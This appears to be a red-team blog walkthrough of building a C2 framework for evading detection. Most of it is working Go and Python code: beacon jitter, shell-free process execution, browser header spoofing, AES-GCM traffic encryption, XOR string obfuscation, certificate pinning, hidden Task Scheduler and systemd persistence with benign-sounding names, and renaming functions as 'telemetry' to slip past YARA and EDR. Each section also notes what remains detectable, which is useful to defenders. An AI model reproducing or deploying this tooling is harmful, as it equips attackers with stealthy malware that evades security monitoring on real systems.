
C2 Development from Scratch: Fixing Every IOC - Phase 2 Walkthrough

April 10, 2026
offensive-security · red-team · c2 · go · python · malware-development

Taking a loud C2 framework and systematically closing every detection surface I documented in Part 1. Browser spoofing, AES-256-GCM, COM-based persistence, certificate pinning, and the engineering problems behind each fix.

1. Introduction

In the first post, I built a C2 framework from scratch and then spent half the article explaining exactly how a Blue Team would catch it. Fixed-interval beaconing, cmd.exe in every process tree, persistence under a registry key literally named C2Agent, plaintext JSON on the wire, and a Go-http-client/1.1 User-Agent header that might as well be a confession.

I ended that post with a roadmap. Jitter, encryption, certificate pinning, direct process execution, COM-based persistence, User-Agent spoofing, URL randomization, API authentication. This post is the follow-through. Every IOC I flagged, what I built to address it, the engineering problems I ran into along the way, and an honest look at what’s still detectable.

Fair warning: this got long. Each fix turned out to be more than “just change the string.” Almost every one had a second-order problem I didn’t anticipate until I was in the middle of it. That’s the point of building from scratch.


2. Killing the Beacon Pattern

The original problem: The agent slept for exactly N seconds between check-ins, every single cycle. RITA (Real Intelligence Threat Analytics) eats this for breakfast. Zero variance over a long enough sample window is a dead giveaway.

The obvious fix is jitter. But there’s a design choice hiding in “add jitter” that isn’t immediately obvious: how you randomize the interval matters.

Percentage-Based vs. Range-Based

Cobalt Strike uses a percentage model. You set a base interval (say 60 seconds) and a jitter percentage (say 50%), and each sleep is drawn from something like Base - (Base * Random_Percentage_up_to_Jitter). The problem is that the mean of a uniform distribution is fixed. Over enough samples, the average sleep converges on a predictable function of the base (with this model, Base * (1 - Jitter/2)), so a defender running statistical analysis on your connection timestamps can solve for the base frequency and flag it.
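A quick Python simulation makes the extraction concrete (my own sketch, assuming the subtract-only model described above): the empirical mean settles at Base * (1 - Jitter/2), and anyone who knows or guesses the model can solve that for the base.

```python
import random

BASE, JITTER = 60.0, 0.5  # 60-second interval, 50% jitter

def cs_style_sleep() -> float:
    # Assumed model: subtract a random fraction (up to JITTER) of the base
    return BASE - BASE * random.uniform(0, JITTER)

samples = [cs_style_sleep() for _ in range(200_000)]
mean = sum(samples) / len(samples)        # converges on BASE * (1 - JITTER/2) = 45s
recovered_base = mean / (1 - JITTER / 2)  # defender solves the mean for the base
```

The defender never needs a single clean sample; averaging noisy timestamps is enough.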

I went with a flat min/max range instead:

// agent/funcs/sync_backoff.go

func CalculateBackoff(min, max time.Duration) time.Duration {
    if min >= max {
        return min
    }
    delta := max - min
    jitter := time.Duration(rand.Int63n(int64(delta)))
    return min + jitter
}

func DelayNextSync(min, max time.Duration) {
    time.Sleep(CalculateBackoff(min, max))
}

The operator sets a minimum and maximum delay at build time (say 8 and 30 seconds). Each sleep is uniformly sampled between the two. There’s no “base” to extract. The mean is just the midpoint of the range, which isn’t more meaningful than any other value. Every duration in the range is equally likely.

The random source is seeded from crypto/rand rather than left on math/rand's default seed, so the sequence is unpredictable even if you know the range.
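For comparison, the same range sampler backed by a CSPRNG is a few lines in Python (a sketch, not the agent's code, using secrets in place of Go's crypto/rand):

```python
import secrets

def calculate_backoff(min_s: int, max_s: int) -> int:
    """Uniform delay in [min_s, max_s); degenerate ranges collapse to min_s."""
    if min_s >= max_s:
        return min_s
    # secrets.randbelow draws from a CSPRNG, so the sequence can't be predicted
    return min_s + secrets.randbelow(max_s - min_s)
```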

What This Doesn’t Solve

A defender watching connection timestamps will still see traffic that never exceeds JitterMax and never drops below JitterMin. That bounding box is itself a weak signature. A sufficiently tuned RITA configuration with custom thresholds could flag it. But it won’t trip the default thresholds on most automated beacon detection tools, and it forces the defender from “run automated scan, get alert” to “manually analyze connection patterns over an extended window.” That’s a meaningful increase in detection cost.


3. Dual Execution Modes

The original problem: Every single command went through cmd.exe /C on Windows or /bin/sh -c on Linux. The process tree for a simple whoami looked like:

agent.exe
  └── cmd.exe /C whoami
        └── whoami.exe

EDR products flag this aggressively. An unknown parent repeatedly spawning cmd.exe with varying arguments is textbook C2.

In the first post, I said the fix was direct Windows API calls: GetUserNameW instead of whoami, FindFirstFile instead of dir. I changed my mind. Writing a syscall wrapper for every command I might ever want to run is a losing game. There are hundreds of Windows utilities, and reimplementing even ten of them in pure Go syscalls would be a massive engineering effort for diminishing returns. Instead, I added a second execution mode that removes the shell from the process tree while still running the original binary:

// agent/funcs/exec_direct.go

func RunDiagnosticProbe(command string) (string, error) {
    binary, args := splitDiagnosticArgs(command)

    resolved, err := exec.LookPath(binary)
    if err != nil {
        return "", fmt.Errorf("not found in PATH: %s", binary)
    }

    ctx, cancel := context.WithTimeout(context.Background(), CommandTimeout)
    defer cancel()

    cmd := exec.CommandContext(ctx, resolved, args...)
    cmd.Dir = getCurrentDir()
    setHideWindow(cmd)

    output, err := cmd.CombinedOutput()
    // ...
}

exec.LookPath searches PATH for the binary, then exec.CommandContext spawns it directly. No shell interpreter in between. The process tree now looks like:

agent.exe
  └── whoami.exe

Still visible if an EDR is watching parent-child relationships closely, but cmd.exe is gone. The signal is much weaker.

The Argument Parser

Removing the shell means losing shell argument parsing. When cmd.exe handles findstr "hello world" file.txt, it knows "hello world" is a single argument. Without a shell, I needed my own parser:

func splitDiagnosticArgs(command string) (string, []string) {
    var tokens []string
    var current strings.Builder
    inDouble := false
    inSingle := false

    for i := 0; i < len(command); i++ {
        c := command[i]
        switch {
        case c == '"' && !inSingle:
            if inDouble && i+1 < len(command) && command[i+1] == '"' {
                current.WriteByte('"') // "" escape (Windows convention)
                i++
            } else {
                inDouble = !inDouble
            }
        case c == '\'' && !inDouble:
            inSingle = !inSingle
        case c == '\\' && inDouble && i+1 < len(command) && command[i+1] == '"':
            current.WriteByte('"') // \" escape
            i++
        case (c == ' ' || c == '\t') && !inDouble && !inSingle:
            if current.Len() > 0 {
                tokens = append(tokens, current.String())
                current.Reset()
            }
        default:
            current.WriteByte(c)
        }
    }
    // Flush the trailing token and guard against an empty command.
    if current.Len() > 0 {
        tokens = append(tokens, current.String())
    }
    if len(tokens) == 0 {
        return "", nil
    }
    return tokens[0], tokens[1:]
}

This handles double quotes, single quotes, \" escapes inside double-quoted strings, and "" as an escaped double-quote (the Windows convention that tripped me up for an embarrassing amount of time). Shell metacharacters like |, >, and && are treated as literal argument strings. They won’t be interpreted.
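To sanity-check the quoting rules, here's a line-for-line Python port of the tokenizer (my sketch; the agent itself is Go):

```python
def split_args(command: str) -> list[str]:
    """Tokenize a command string: double/single quotes, \" and "" escapes."""
    tokens, cur = [], []
    in_double = in_single = False
    i = 0
    while i < len(command):
        c = command[i]
        if c == '"' and not in_single:
            if in_double and i + 1 < len(command) and command[i + 1] == '"':
                cur.append('"'); i += 1          # "" escape (Windows convention)
            else:
                in_double = not in_double
        elif c == "'" and not in_double:
            in_single = not in_single
        elif c == '\\' and in_double and i + 1 < len(command) and command[i + 1] == '"':
            cur.append('"'); i += 1              # \" escape inside double quotes
        elif c in ' \t' and not in_double and not in_single:
            if cur:
                tokens.append(''.join(cur)); cur = []
        else:
            cur.append(c)
        i += 1
    if cur:
        tokens.append(''.join(cur))
    return tokens
```

Note that a metacharacter like && comes out as an ordinary token; nothing in this parser chains commands.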

Which is why the shell mode still exists. When the operator needs pipes, redirects, or command chaining, they prefix the command with shell and accept the OPSEC cost:

whoami                              → exec mode (default, no shell)
net user admin /domain              → exec mode
shell dir C:\Users && whoami        → shell mode (needs &&)
shell cat /etc/passwd | grep root   → shell mode (needs pipe)

The server tags each task with a type field ("exec" or "shell"), and the agent’s dispatcher routes accordingly:

switch j.Type {
case "exec":
    output, execErr = funcs.RunDiagnosticProbe(j.Command)
default:
    output, execErr = funcs.ExecuteDiagnosticTask(j.Command)
}

The dashboard shows a green [exec] badge or an orange [shell] badge next to each command, so the operator knows exactly which mode ran. The OPSEC decision is explicit, visible, and never automatic.


4. Browser Profile Spoofing

The original problem: Go’s http.DefaultClient sends User-Agent: Go-http-client/1.1, which is an immediate flag. I said the fix was to spoof the User-Agent to match normal browser traffic.

What I didn’t appreciate at the time is that just setting the User-Agent string is maybe 20% of the problem. Modern browsers send a pile of metadata headers alongside every request, and they change depending on context. Getting the UA right but everything else wrong creates an IOC on its own: the User-Agent says Chrome, but the rest of the headers say “something that has never been a browser.”

The Header Problem

A real Chrome request to a website includes:

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ...
Sec-Ch-Ua: "Chromium";v="147", "Not-A.Brand";v="24", "Google Chrome";v="147"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: document
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,...
Accept-Language: en-US,en;q=0.9

A Chrome fetch() call from JavaScript includes:

Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
Accept: */*

Notice what changed. navigate became cors, document became empty, Sec-Fetch-User and Upgrade-Insecure-Requests disappeared entirely, and the Accept header changed. These aren’t optional differences. If the agent sends Sec-Fetch-Mode: navigate on a JSON POST to an API endpoint, that’s a logical impossibility: real browsers never do that. A navigation is a page load triggered by the user clicking a link or typing a URL; a POST with a JSON body is a programmatic API call. They have different security semantics, and Chrome enforces that distinction in its headers.

If someone is running network analysis and they see a request that claims to be Chrome navigating to a page, but the body is JSON and the method is POST, that’s not Chrome. That’s something pretending to be Chrome, and pretending badly.

The UATransport

The fix is a custom http.RoundTripper that intercepts every outbound HTTP request and injects the correct header set based on what the request actually is:

// agent/funcs/ua.go

type UATransport struct {
    Base    http.RoundTripper
    Profile Profile
}

func (t *UATransport) RoundTrip(req *http.Request) (*http.Response, error) {
    clone := req.Clone(req.Context())
    isFetch := req.Method == "POST"

    clone.Header.Del("User-Agent")

    for key, value := range t.Profile.Headers {
        switch {
        case isFetch && key == "Sec-Fetch-Mode":
            clone.Header.Set(key, "cors")
        case isFetch && key == "Sec-Fetch-Dest":
            clone.Header.Set(key, "empty")
        case isFetch && key == "Sec-Fetch-Site":
            clone.Header.Set(key, "same-origin")
        case isFetch && (key == "Sec-Fetch-User" || key == "Upgrade-Insecure-Requests"):
            continue // Drop navigation-only headers on fetch
        default:
            clone.Header.Set(key, value)
        }
    }

    clone.Header.Set("User-Agent", t.Profile.UserAgent)
    return t.Base.RoundTrip(clone)
}

POST requests (check-ins, result submissions) get fetch context. GET requests (file downloads) get navigation context. The transport is wired into http.DefaultClient at init, so every HTTP call the agent makes goes through it; no code path can accidentally bypass the spoofing.
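The header-selection logic is easier to see stripped of the Go plumbing. A Python sketch of the same decision table (names are mine, illustrative only):

```python
# Headers that only exist on user-initiated navigations
NAV_ONLY = {"Sec-Fetch-User", "Upgrade-Insecure-Requests"}

# Values swapped in when the request should look like a fetch() call
FETCH_OVERRIDES = {
    "Sec-Fetch-Mode": "cors",
    "Sec-Fetch-Dest": "empty",
    "Sec-Fetch-Site": "same-origin",
}

def contextual_headers(profile_headers: dict, method: str) -> dict:
    """POSTs get fetch() semantics; everything else keeps navigation defaults."""
    is_fetch = method == "POST"
    out = {}
    for key, value in profile_headers.items():
        if is_fetch and key in NAV_ONLY:
            continue  # drop navigation-only headers entirely
        out[key] = FETCH_OVERRIDES.get(key, value) if is_fetch else value
    return out
```

Like the Go version, this leaves Accept to the profile; a stricter port would also swap Accept to */* in fetch context.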

Five Profiles

The agent ships with five browser profiles, each matching a real browser’s current fingerprint:

  1. Chrome 147 / Windows 10 - full Sec-Ch-Ua client hints with the real stable build string (147.0.7727.55) and the correct Not-A.Brand version (v="24")
  2. Chrome 147 / Linux
  3. Firefox 149 / Windows 10 - no client hints (Firefox doesn’t send them), Firefox-specific Accept header format
  4. Firefox 149 / Linux
  5. Safari 26 / macOS - AppleWebKit/605.1.15 engine string, Safari-specific defaults

The operator selects a profile at build time, and the profile ID and a configurable locale string (for Accept-Language) are baked into the binary.

A Mistake I Made Along the Way

My first Chrome profiles used the placeholder version pattern: Chrome/147.0.0.0 and Not-A.Brand";v="99". This is the pattern that appears in Chrome’s documentation examples and in a lot of spoofing guides. The problem is that real Chrome never ships with .0.0.0 as the minor/build/patch version, and v="99" is the old placeholder that Chrome has since replaced with v="24". Fingerprinting tools specifically flag these placeholder patterns because they indicate a non-genuine client. I had to go check what actual Chrome stable was sending in the wild and match those exact values.
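A fingerprint checker's placeholder test can be approximated in a few lines (purely illustrative; real tools carry far larger rule sets):

```python
import re

def looks_like_placeholder(headers: dict) -> bool:
    # Two telltale placeholder patterns: a Chrome/NNN.0.0.0 UA version
    # and the retired Not-A.Brand v="99" client hint
    ua = headers.get("User-Agent", "")
    hints = headers.get("Sec-Ch-Ua", "")
    return bool(re.search(r'Chrome/\d+\.0\.0\.0', ua)) or 'v="99"' in hints
```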

This is the kind of thing you don’t learn from reading about spoofing. You learn it by building it, testing it against a fingerprint checker, and watching it get flagged for a reason you didn’t expect.

What This Doesn’t Solve

The browser profile spoofing works at the HTTP layer; it doesn’t touch the TLS layer. Go’s TLS stack produces a distinctive JA3 fingerprint (a hash of the TLS client hello parameters) that doesn’t match any real browser. A defender correlating the JA3 hash against the claimed User-Agent would see Chrome headers but a Go TLS handshake. The fix is uTLS, a library that lets you mimic a specific browser’s TLS handshake. That’s Phase 3.


5. Payload Encryption (AES-256-GCM)

The original problem: All C2 traffic was plaintext JSON. Check-in payloads, command output, exfiltrated files, all readable by any network tap. A Suricata rule matching "agent_id" in POST bodies would catch every check-in.

Per-Build Keys

At build time, the server generates a fresh 32-byte key and derives an 8-character fingerprint from its SHA-256:

# server/crypto.py

def generate_key():
    key_bytes = os.urandom(32)
    key_hex = key_bytes.hex()
    key_id = hashlib.sha256(key_bytes).hexdigest()[:8]
    return key_hex, key_id

The key is hex-encoded and baked into the agent binary. The key_id fingerprint is not secret: it’s sent in the clear with every message so the server knows which decryption key to use. Since each build gets its own key, the server can manage agents from different builds simultaneously, and compromising one build’s key tells you nothing about another.

The Encryption

AES-256-GCM with a random 12-byte nonce per message:

// agent/funcs/seal.go

func SealTelemetry(key []byte, plaintext []byte) (string, error) {
    block, err := aes.NewCipher(key)
    if err != nil {
        return "", err
    }
    gcm, err := cipher.NewGCM(block)
    if err != nil {
        return "", err
    }

    nonce := make([]byte, gcm.NonceSize()) // 12 bytes
    if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
        return "", err
    }

    blob := gcm.Seal(nonce, nonce, plaintext, nil)
    return base64.StdEncoding.EncodeToString(blob), nil
}

The gcm.Seal(nonce, nonce, plaintext, nil) call is doing something a little non-obvious. The first nonce argument is the destination slice prefix, the output gets appended to it. So the result is [12-byte nonce][ciphertext][16-byte GCM auth tag], all in one blob. The receiver splits on byte 12 to separate the nonce from the ciphertext.

I chose GCM specifically because it’s an authenticated encryption mode. The 16-byte tag means any tampering with the ciphertext causes decryption to fail, so a network proxy can’t modify commands in transit (say, changing whoami to shutdown /s) without invalidating the authentication tag. What GCM doesn’t give you is replay protection: a captured blob can be re-sent and will decrypt just fine. The server could detect replays by tracking seen nonces, but it currently doesn’t. That’s a known gap.

The Envelope

Every message between agent and server wraps the encrypted payload in a simple JSON envelope:

{
    "kid": "a3f7c2e1",
    "data": "Base64(nonce + ciphertext + tag)"
}

The server-side decryption mirrors the agent:

# server/crypto.py

def decrypt_payload(key_hex, encoded):
    key = bytes.fromhex(key_hex)
    raw = base64.b64decode(encoded)
    nonce, ct = raw[:12], raw[12:]
    return AESGCM(key).decrypt(nonce, ct, None)

If the key is wrong or the data has been tampered with, AESGCM.decrypt() raises InvalidTag and the request is rejected.
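Putting the two halves together, a round-trip sketch in Python (using the same cryptography AEAD primitive as the server; the seal/unseal names here are mine):

```python
import base64
import hashlib
import os

from cryptography.hazmat.primitives.ciphers.aead import AESGCM

key = os.urandom(32)
kid = hashlib.sha256(key).hexdigest()[:8]  # non-secret key fingerprint

def seal(key: bytes, plaintext: bytes) -> str:
    nonce = os.urandom(12)
    # Output layout: [12-byte nonce][ciphertext][16-byte tag], base64'd for JSON
    return base64.b64encode(nonce + AESGCM(key).encrypt(nonce, plaintext, None)).decode()

def unseal(key: bytes, encoded: str) -> bytes:
    raw = base64.b64decode(encoded)
    return AESGCM(key).decrypt(raw[:12], raw[12:], None)

envelope = {"kid": kid, "data": seal(key, b'{"agent_id": "demo"}')}
```

Flipping a single bit anywhere in the blob makes AESGCM.decrypt raise InvalidTag, which is the tamper-resistance property in action.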

What This Doesn’t Solve

Encryption makes the payload opaque. It doesn’t make the traffic invisible. A network analyst can still see that something is making periodic POST requests to the same endpoint with similar-sized JSON bodies. Traffic analysis (connection timing, payload size patterns, IP reputation) operates on metadata, not content. The encryption prevents a Suricata rule from matching on specific field names in the body, but it doesn’t prevent behavioral analysis from flagging the pattern.


6. XOR String Obfuscation

The original problem: Running strings against the compiled binary would reveal the server URL, all API paths, the self-destruct (__selfdestruct__), and the persistence service name. Any YARA rule matching those strings would instantly classify the binary.

AES handles the wire, while XOR handles the binary.

At build time, the server generates a random 32-byte key per build and encrypts every sensitive string before writing it into the generated config.go:

# server/app.py

def _xor_encrypt(key, plaintext):
    data = plaintext.encode()
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).hex()

The result is hex-encoded and written as a Go string literal. At runtime, the agent decodes them into memory on first use:

// agent/funcs/config_decode.go

func ResolveConfig(key []byte, hexData string) string {
    data, _ := hex.DecodeString(hexData)
    out := make([]byte, len(data))
    for i, b := range data {
        out[i] = b ^ key[i%len(key)]
    }
    return string(out)
}

The generated config.go looks like this:

func InitializeTelemetry() {
    TelemetryEndpoint = funcs.ResolveConfig(obfKey, "a7c3f2e1b9d0...")
    PathCheckin       = funcs.ResolveConfig(obfKey, "b1d4e5f6a2c3...")
    PathResult        = funcs.ResolveConfig(obfKey, "c9e8f7d6b5a4...")
    FlushCommand      = funcs.ResolveConfig(obfKey, "d2f1a3b4c5e6...")
    ServiceLabel      = funcs.ResolveConfig(obfKey, "e4b6c8d9a1f2...")
}

Nothing sensitive appears as a printable string in the binary. strings turns up hex garbage.
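XOR is its own inverse, so the decode path is the encode path with the roles swapped. A round-trip sketch mirroring both sides (Python stands in for the Go decoder here; the URL is a made-up example):

```python
import os

def xor_hex(key: bytes, plaintext: str) -> str:
    # Build-time: repeating-key XOR, hex-encoded into the generated config
    data = plaintext.encode()
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).hex()

def resolve_config(key: bytes, hex_data: str) -> str:
    # Run-time: the identical operation recovers the plaintext
    data = bytes.fromhex(hex_data)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data)).decode()

obf_key = os.urandom(32)
blob = xor_hex(obf_key, "https://10.0.0.5:8443")
```

The blob contains only hex digits, which is all a strings pass over the binary ever sees.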

Is XOR real encryption? No, and I’m not going to pretend it is. XOR with a repeating key is trivially breakable with known-plaintext or frequency analysis. If a reverse engineer opens the binary in Ghidra, finds the ResolveConfig function, grabs the XOR key from the neighboring variable, and runs the decryption manually, they’ll have every string in clear text in about ten minutes. But the threat model for string obfuscation isn’t a reverse engineer doing focused analysis; it’s automated scanners: YARA rules, EDR heuristics, the SOC analyst’s strings | grep during initial triage. XOR defeats all of those. It buys you time by moving the binary from “instantly flagged by automated tools” to “requires manual analysis to classify.”


7. Certificate Pinning

The original problem: All traffic was unencrypted HTTP. The fix was HTTPS, but self-signed certificates introduce their own trust problem.

The Trust Problem

When you use a self-signed cert, the agent can’t validate it through the normal certificate chain (there’s no CA that vouches for it). If you just set InsecureSkipVerify: true and call it a day, you’ve encrypted the transport but you haven’t authenticated the server. A man-in-the-middle can present their own cert and the agent will happily connect. You’ve built a door and then left it open.

Certificate pinning solves this. Instead of trusting a CA chain, the agent knows the exact public key it expects to see, baked into the binary at build time. If the TLS handshake presents a different key, the connection is refused. No fallback.

How It Works

The operator generates a self-signed cert before starting the server:

python gen_cert.py --cn localhost --san-ip 127.0.0.1 --san-dns localhost

The server auto-detects server/certs/server.crt at startup and switches to HTTPS. At build time, the pipeline reads the cert, extracts the SPKI (Subject Public Key Info), hashes it with SHA-256, XOR-encrypts the hash, and bakes it into the binary:

def compute_spki_pin(cert):
    spki_der = cert.public_key().public_bytes(
        Encoding.DER, PublicFormat.SubjectPublicKeyInfo
    )
    return hashlib.sha256(spki_der).hexdigest()

At runtime, the agent sets up a custom TLS verifier:

// agent/funcs/pinverify.go

func MakePinVerifier(pinnedHash string) func([][]byte, [][]*x509.Certificate) error {
    return func(rawCerts [][]byte, _ [][]*x509.Certificate) error {
        if len(rawCerts) == 0 {
            return fmt.Errorf("no certificate presented")
        }

        cert, err := x509.ParseCertificate(rawCerts[0])
        if err != nil {
            return fmt.Errorf("failed to parse certificate: %w", err)
        }

        spkiDER, err := x509.MarshalPKIXPublicKey(cert.PublicKey)
        if err != nil {
            return fmt.Errorf("failed to marshal public key: %w", err)
        }

        hash := sha256.Sum256(spkiDER)
        actual := hex.EncodeToString(hash[:])

        if actual != pinnedHash {
            return fmt.Errorf("certificate pin mismatch")
        }
        return nil
    }
}

The TLS config uses InsecureSkipVerify: true (to bypass the CA chain check that would reject a self-signed cert) and replaces it with VerifyPeerCertificate pointing at the pin verifier. The agent extracts the leaf certificate from the TLS handshake, serializes its public key to SPKI DER format, SHA-256 hashes it, and compares. Mismatch = hard fail, no retry, no fallback.

There’s also a panic at startup if a pin is set but the server URL starts with http://. Running pin verification over unencrypted HTTP is a contradiction that should fail.

Why Pin the SPKI, Not the Whole Certificate?

If I pinned the full certificate hash, the agent would break every time the cert was renewed, even if the key pair stayed the same (just the expiry date changed). By pinning just the public key’s SPKI hash, the operator can re-sign the cert with a new validity period and existing agents keep working. If they actually rotate the key pair, they rebuild all agents. That’s a reasonable trade-off, in my opinion (for now).
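The trade-off is easy to demonstrate: re-sign the same key pair twice and the SPKI pin is identical while the certificate bytes are not. A sketch using the cryptography package (CN and validity values are arbitrary):

```python
import datetime
import hashlib

from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import ec

key = ec.generate_private_key(ec.SECP256R1())

def self_sign(key, days: int) -> x509.Certificate:
    # Minimal self-signed cert: subject == issuer, random serial
    name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "localhost")])
    now = datetime.datetime.now(datetime.timezone.utc)
    return (x509.CertificateBuilder()
            .subject_name(name).issuer_name(name)
            .public_key(key.public_key())
            .serial_number(x509.random_serial_number())
            .not_valid_before(now)
            .not_valid_after(now + datetime.timedelta(days=days))
            .sign(key, hashes.SHA256()))

def spki_pin(cert: x509.Certificate) -> str:
    der = cert.public_key().public_bytes(
        serialization.Encoding.DER,
        serialization.PublicFormat.SubjectPublicKeyInfo)
    return hashlib.sha256(der).hexdigest()

# Same key pair, two different validity periods
cert_a, cert_b = self_sign(key, 30), self_sign(key, 365)
```

Pinning the whole-certificate hash instead would break on every renewal, since the serial and validity fields change even when the key doesn't.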


8. Randomized URL Slugs

The original problem: /api/checkin, /api/result, /api/upload: descriptive, human-readable, and easy to write Snort/Suricata signatures for.

At first server launch, four random 8-character hex slugs are generated and stored in SQLite:

def _init_agent_paths():
    keys = ["path_checkin", "path_result", "path_upload", "path_files"]
    for k in keys:
        stored[k] = "/" + secrets.token_hex(4)  # e.g. "/a1b2c3d4"

The agent-facing endpoints now live at paths like /a1b2c3d4. The slugs persist across server restarts so existing agents stay connected. At build time, all four paths are XOR-encrypted and baked into the agent binary. They never appear as plaintext in the binary or in the agent’s source code.

The operator-facing API (/api/task, /api/agents, /api/builds, etc.) still lives at /api/*. This split also makes the API key authentication simpler: the @before_request hook checks for an X-API-Key header on any path starting with /api/. Agent-facing paths fall outside that namespace, so agents don’t need the operator key.

Signature-based detection now has to target per-deployment paths that look like any other random hex identifier: a session token, a UUID fragment, a CDN cache key. Not impossible to detect, but the analyst can’t write one rule that catches every deployment.


9. Persistence: Scheduled Tasks and Systemd

The original problem: Three compounding failures. Windows persistence spawned reg.exe (visible in process tree), wrote to the most-monitored registry key in existence (HKCU\...\Run), and named the entry C2Agent.

I replaced this with two new persistence backends. The legacy methods (registry run key, crontab @reboot) are still available for operators who want to test detection rules for those specific mechanisms, but the defaults are now significantly quieter.

Windows: Task Scheduler via COM

Instead of spawning schtasks.exe or reg.exe, the agent talks directly to the Task Scheduler through the COM API. No child process. Everything happens in-process:

// agent/funcs/update_scheduler_windows.go

func registerUpdateSchedule(exePath string) error {
    ole.CoInitializeEx(0, ole.COINIT_APARTMENTTHREADED)
    defer ole.CoUninitialize()

    unknown, _ := oleutil.CreateObject("Schedule.Service")
    service, _ := unknown.QueryInterface(ole.IID_IDispatch)
    defer service.Release()

    oleutil.CallMethod(service, "Connect")

    folder := oleutil.MustCallMethod(service, "GetFolder", "\\").ToIDispatch()
    defer folder.Release()

    def := oleutil.MustCallMethod(service, "NewTask", 0).ToIDispatch()
    defer def.Release()
    // ...
}

The task is configured with a logon trigger (fires on user login), standard user privileges (no UAC prompt), marked hidden in the Task Scheduler UI, and no execution time limit. The registration flag is 6 (TASK_CREATE_OR_UPDATE), so running the agent twice updates the existing task instead of creating a duplicate.

The task name comes from the XOR-obfuscated ServiceLabel constant, which decodes to EndpointAutoUpdate. The description:

Keeps endpoint telemetry data in sync with the management server.

That reads like corporate endpoint management software. A sysadmin scrolling through Task Scheduler wouldn’t look twice. An analyst specifically hunting for new scheduled tasks (Windows Event ID 4698) would still find it, but the name and description wouldn’t scream “malware.”

One thing that tripped me up during development: COM object lifecycle management. Every QueryInterface, every MustCallMethod that returns an IDispatch, every ToIDispatch() conversion creates a COM reference that needs to be released. If you miss a Release() call, you leak COM references. In a short-lived program this doesn’t matter much, but if the persistence code ever ran in a loop (retry logic, re-registration), the leak would compound. Every COM object now gets a deferred Release() immediately after acquisition.

Linux: Systemd User Service

On Linux, the agent writes a systemd user service and enables it:

func registerUpdateDaemon(exePath string) error {
    home := os.Getenv("HOME")
    if home == "" {
        return fmt.Errorf("$HOME is not set")
    }

    unitDir := filepath.Join(home, ".config", "systemd", "user")
    os.MkdirAll(unitDir, 0755)

    unitContent := fmt.Sprintf(`[Unit]
Description=Endpoint Telemetry Diagnostics Daemon
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
ExecStart=%s
Restart=on-failure
RestartSec=30

[Install]
WantedBy=default.target
`, exePath)

    unitPath := filepath.Join(unitDir, ServiceLabel+".service")
    os.WriteFile(unitPath, []byte(unitContent), 0644)

    exec.Command("systemctl", "--user", "daemon-reload").CombinedOutput()
    exec.Command("systemctl", "--user", "enable", ServiceLabel+".service").CombinedOutput()

    return nil
}

A few design decisions here:

User-level, no root. The --user flag means this runs under the current user’s systemd instance. No sudo, no privilege escalation. The trade-off is that the service only runs while the user is logged in, unless the system has loginctl enable-linger set for that user. We don’t touch linger because it requires root or polkit authorization on most distros, and attempting it would be noisy.

Auto-restart. Restart=on-failure with RestartSec=30 means if the agent crashes, systemd brings it back after 30 seconds. Free reliability that I don’t have to implement in the agent itself.

Network dependency. After=network-online.target and Wants=network-online.target mean the service waits for network connectivity before starting. Without this, the agent would start, fail its first check-in because the network isn’t up yet, and either error out or waste cycles retrying during boot.

$HOME check. If $HOME is unset (some container environments, some su configurations), the install fails with a clear error instead of silently writing the unit file to a .config/systemd/user path relative to wherever the process happens to be running.

Removal is symmetric: disable, stop, delete the unit file, daemon-reload. The symmetry matters because the self-destruct sequence calls RemoveAutoUpdater(), and a removal path that doesn’t undo everything the install did will leave artifacts.

macOS

Not implemented. The build server rejects macOS builds with persist_method != "none" at compile time. macOS persistence would need a LaunchAgent plist in ~/Library/LaunchAgents/, which is a different mechanism. Phase 3 (probably).


10. Cover-Story Naming

The original problem: strings agent.exe | grep -i "persist\|exfil\|command" would immediately classify the binary. Even with symbols stripped (-s -w), Go embeds function names for runtime reflection and stack traces.

Every function, variable, source file, and the Go module itself now follows an “endpoint telemetry/diagnostics” naming convention.

| What Changed | Before | After |
| --- | --- | --- |
| Check-in function | checkIn() | SyncDeviceState() |
| Result submission | sendResult() | SubmitDiagnosticReport() |
| Self-destruct | SelfDestruct() | WipeLocalCacheAndExit() |
| Persistence | persist() | InstallAutoUpdater() |
| Shell execution | ExecuteCommand() | ExecuteDiagnosticTask() |
| Direct execution | RunDirectCommand() | RunDiagnosticProbe() |
| File upload | UploadFile() | SubmitCrashDump() |
| File download | DownloadFile() | FetchUpdatePackage() |
| Encryption | EncryptPayload() | SealTelemetry() |
| Decryption | DecryptPayload() | UnsealTelemetry() |
| Jitter calculation | CalculateJitter() | CalculateBackoff() |
| Go module | c2-agent | endpoint-telemetry |

Source files got the same treatment: selfdestruct.go -> cache_purge.go, persist.go -> auto_updater.go, shell.go -> exec_diag.go, transfer.go -> dump_sync.go.

Build metadata cleanup. -trimpath strips absolute host build paths from the binary. Without it, strings reveals C:\Users\<USER>\Desktop\repos\C2-Project\agent\funcs\selfdestruct.go, which is not exactly subtle. -buildid= clears the per-build hash. The Go module rename (c2-agent -> endpoint-telemetry) handles the module name that Go embeds in every binary regardless of strip flags.

Will a skilled reverse engineer be fooled? No. Once they’re reading disassembly and tracing data flows, the names are irrelevant. But this isn’t about defeating human analysis. It’s about surviving automated classification: YARA rules matching suspicious function names, EDR heuristics looking for known-bad string patterns, the SOC analyst running a quick strings triage before deciding whether to escalate. If the names say “telemetry” and “diagnostics,” the binary goes to the bottom of the priority queue instead of the top.


11. Server Hardening

Three problems from the original, three fixes.

API Key Authentication

All /api/* endpoints now require a valid X-API-Key header:

@app.before_request
def check_api_key():
    if request.path.startswith("/api/"):
        key = request.headers.get("X-API-Key", "")
        stored_key = _get_config_value("api_key")
        if not stored_key or not hmac.compare_digest(key, stored_key):
            return jsonify({"error": "Unauthorized"}), 401

The key is a 32-character hex string generated at first launch and stored in server_config. It’s printed to the operator’s terminal on startup.

